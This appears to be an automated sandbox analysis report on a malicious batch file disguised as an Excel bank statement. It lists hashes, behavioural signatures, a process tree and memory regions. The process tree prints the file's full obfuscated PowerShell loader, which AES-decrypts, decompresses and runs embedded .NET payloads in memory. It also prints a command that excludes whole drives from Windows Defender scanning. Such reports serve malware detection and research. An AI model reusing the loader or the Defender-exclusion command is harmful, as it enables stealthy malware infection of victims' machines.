Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/01/2024, 15:33

General

  • Target

    56419_Ekstre_22012202.XLSX.bat

  • Size

    551KB

  • MD5

    93ffa97cac3aee1759f1263417ba68c4

  • SHA1

    f987f902cb03fd968640e30e5ce02aa3d686559b

  • SHA256

    0318fe2580ee49d1d554d04861bf1993dcd36847baa7006b1dd6d6f3df6993e9

  • SHA512

    33db2fc6d11757105824d3a33b626930baef58d002124a4cd8ad8e26fd5ee64fa760348abcadce1aca7fab9593c3e381627a49ae97541f54134e9f7a2c843207

  • SSDEEP

    12288:YjfWxwAqoJ6gq9xDB2M4B5u2EJ52JWLCKszzUtakIjW0pibC4QMCiYRhfwvz7:A/Aqec9xDBfZXTLCVztpd45CtRhQz7

Score
3/10

Malware Config

Signatures

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4840
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\56419_Ekstre_22012202.XLSX.bat';$ZnXf='LosUlIadsUlI'.Replace('sUlI', ''),'CoYoykpyTYoykoYoyk'.Replace('Yoyk', ''),'InvKVvhokKVvheKVvh'.Replace('KVvh', ''),'ReaHzYUdLHzYUinHzYUesHzYU'.Replace('HzYU', ''),'GRhkEetRhkECuRhkErreRhkEntRhkEPRhkErocRhkEesRhkEsRhkE'.Replace('RhkE', ''),'DWyqDecWyqDoWyqDmpWyqDrWyqDesWyqDsWyqD'.Replace('WyqD', ''),'ChaaxiungaxiueaxiuExtaxiuensaxiuionaxiu'.Replace('axiu', ''),'FSUITroSUITmBaSUITseSUIT64SUITSSUITtrSUITingSUIT'.Replace('SUIT', ''),'ElIthAemeIthAnIthAtAIthAtIthA'.Replace('IthA', ''),'CuhKsruhKseuhKsateuhKsDeuhKscruhKsypuhKstuhKsoruhKs'.Replace('uhKs', ''),'SSGjzplSGjzitSGjz'.Replace('SGjz', ''),'EnylxutylxurylxuyPylxuoylxuiylxuntylxu'.Replace('ylxu', ''),'TUGbIraUGbInsUGbIfoUGbIrmUGbIFinUGbIalBUGbIloUGbIcUGbIkUGbI'.Replace('UGbI', ''),'MaiLJmhnMLJmhodLJmhuleLJmh'.Replace('LJmh', '');powershell -w hidden;function zVqiZ($ADZsr){$phgKT=[System.Security.Cryptography.Aes]::Create();$phgKT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$phgKT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$phgKT.Key=[System.Convert]::($ZnXf[7])('LLFztVl9QVwnRpd+WQrk03Mcs5Q/zcS7jOTtyEQLFsQ=');$phgKT.IV=[System.Convert]::($ZnXf[7])('8oDwRwNSJIxTBzexHnRKYg==');$bWWBv=$phgKT.($ZnXf[9])();$XGurB=$bWWBv.($ZnXf[12])($ADZsr,0,$ADZsr.Length);$bWWBv.Dispose();$phgKT.Dispose();$XGurB;}function SfJcX($ADZsr){$zxrJb=New-Object System.IO.MemoryStream(,$ADZsr);$mKrBy=New-Object System.IO.MemoryStream;$fRiUi=New-Object System.IO.Compression.GZipStream($zxrJb,[IO.Compression.CompressionMode]::($ZnXf[5]));$fRiUi.($ZnXf[1])($mKrBy);$fRiUi.Dispose();$zxrJb.Dispose();$mKrBy.Dispose();$mKrBy.ToArray();}$zWOlL=[System.IO.File]::($ZnXf[3])([Console]::Title);$dsCLJ=SfJcX (zVqiZ ([Convert]::($ZnXf[7])([System.Linq.Enumerable]::($ZnXf[8])($zWOlL, 5).Substring(2))));$jcGog=SfJcX (zVqiZ ([Convert]::($ZnXf[7])([System.Linq.Enumerable]::($ZnXf[8])($zWOlL, 6).Substring(2))));[System.Reflection.Assembly]::($ZnXf[0])([byte[]]$jcGog).($ZnXf[11]).($ZnXf[2])($null,$null);[System.Reflection.Assembly]::($ZnXf[0])([byte[]]$dsCLJ).($ZnXf[11]).($ZnXf[2])($null,$null); "
        3⤵
          PID:4976
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 2620
            4⤵
            • Program crash
            PID:3516
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1368 -ip 1368
      1⤵
        PID:3748

      Network

            MITRE ATT&CK Matrix

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              1KB

              MD5

              928d36ad618a369ffebf44885d07cf81

              SHA1

              edf5a353a919c1873af8e6a0dfafa4c38c626975

              SHA256

              d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

              SHA512

              4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gbtmr4qv.erc.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • memory/1088-25-0x0000000002C80000-0x0000000002C90000-memory.dmp

              Filesize

              64KB

            • memory/1088-26-0x0000000002C80000-0x0000000002C90000-memory.dmp

              Filesize

              64KB

            • memory/1088-24-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1088-38-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1368-2-0x0000000004D20000-0x0000000004D30000-memory.dmp

              Filesize

              64KB

            • memory/1368-22-0x0000000007B70000-0x00000000081EA000-memory.dmp

              Filesize

              6.5MB

            • memory/1368-83-0x0000000000400000-0x000000000043F000-memory.dmp

              Filesize

              252KB

            • memory/1368-4-0x0000000005360000-0x0000000005988000-memory.dmp

              Filesize

              6.2MB

            • memory/1368-5-0x00000000052B0000-0x00000000052D2000-memory.dmp

              Filesize

              136KB

            • memory/1368-6-0x0000000005B80000-0x0000000005BE6000-memory.dmp

              Filesize

              408KB

            • memory/1368-7-0x0000000005BF0000-0x0000000005C56000-memory.dmp

              Filesize

              408KB

            • memory/1368-13-0x0000000005C60000-0x0000000005FB4000-memory.dmp

              Filesize

              3.3MB

            • memory/1368-18-0x0000000006190000-0x00000000061AE000-memory.dmp

              Filesize

              120KB

            • memory/1368-19-0x00000000061C0000-0x000000000620C000-memory.dmp

              Filesize

              304KB

            • memory/1368-20-0x00000000066E0000-0x0000000006724000-memory.dmp

              Filesize

              272KB

            • memory/1368-21-0x0000000007470000-0x00000000074E6000-memory.dmp

              Filesize

              472KB

            • memory/1368-23-0x0000000007510000-0x000000000752A000-memory.dmp

              Filesize

              104KB

            • memory/1368-3-0x0000000004D20000-0x0000000004D30000-memory.dmp

              Filesize

              64KB

            • memory/1368-39-0x0000000002830000-0x000000000283A000-memory.dmp

              Filesize

              40KB

            • memory/1368-41-0x0000000077171000-0x0000000077291000-memory.dmp

              Filesize

              1.1MB

            • memory/1368-42-0x0000000007910000-0x000000000797A000-memory.dmp

              Filesize

              424KB

            • memory/1368-1-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1368-0-0x0000000004CA0000-0x0000000004CD6000-memory.dmp

              Filesize

              216KB

            • memory/1368-90-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1368-88-0x0000000004D20000-0x0000000004D30000-memory.dmp

              Filesize

              64KB

            • memory/1368-87-0x0000000009540000-0x000000000988A000-memory.dmp

              Filesize

              3.3MB

            • memory/1368-86-0x0000000004D20000-0x0000000004D30000-memory.dmp

              Filesize

              64KB

            • memory/1368-85-0x0000000000400000-0x000000000043F000-memory.dmp

              Filesize

              252KB

            • memory/1368-84-0x0000000000400000-0x000000000043F000-memory.dmp

              Filesize

              252KB

            • memory/1368-82-0x00000000075E0000-0x00000000075EC000-memory.dmp

              Filesize

              48KB

            • memory/1368-69-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1400-46-0x0000000004F90000-0x0000000004FA0000-memory.dmp

              Filesize

              64KB

            • memory/1400-73-0x00000000076E0000-0x00000000076EA000-memory.dmp

              Filesize

              40KB

            • memory/1400-58-0x00000000704F0000-0x000000007053C000-memory.dmp

              Filesize

              304KB

            • memory/1400-74-0x00000000078F0000-0x0000000007986000-memory.dmp

              Filesize

              600KB

            • memory/1400-75-0x0000000007870000-0x0000000007881000-memory.dmp

              Filesize

              68KB

            • memory/1400-76-0x00000000078A0000-0x00000000078AE000-memory.dmp

              Filesize

              56KB

            • memory/1400-77-0x00000000078B0000-0x00000000078C4000-memory.dmp

              Filesize

              80KB

            • memory/1400-79-0x0000000007990000-0x0000000007998000-memory.dmp

              Filesize

              32KB

            • memory/1400-78-0x00000000079B0000-0x00000000079CA000-memory.dmp

              Filesize

              104KB

            • memory/1400-68-0x00000000074E0000-0x00000000074FE000-memory.dmp

              Filesize

              120KB

            • memory/1400-70-0x0000000004F90000-0x0000000004FA0000-memory.dmp

              Filesize

              64KB

            • memory/1400-72-0x0000000004F90000-0x0000000004FA0000-memory.dmp

              Filesize

              64KB

            • memory/1400-81-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1400-71-0x0000000007540000-0x00000000075E3000-memory.dmp

              Filesize

              652KB

            • memory/1400-57-0x0000000007500000-0x0000000007532000-memory.dmp

              Filesize

              200KB

            • memory/1400-56-0x000000007EE20000-0x000000007EE30000-memory.dmp

              Filesize

              64KB

            • memory/1400-44-0x0000000074750000-0x0000000074F00000-memory.dmp

              Filesize

              7.7MB

            • memory/1400-45-0x0000000004F90000-0x0000000004FA0000-memory.dmp

              Filesize

              64KB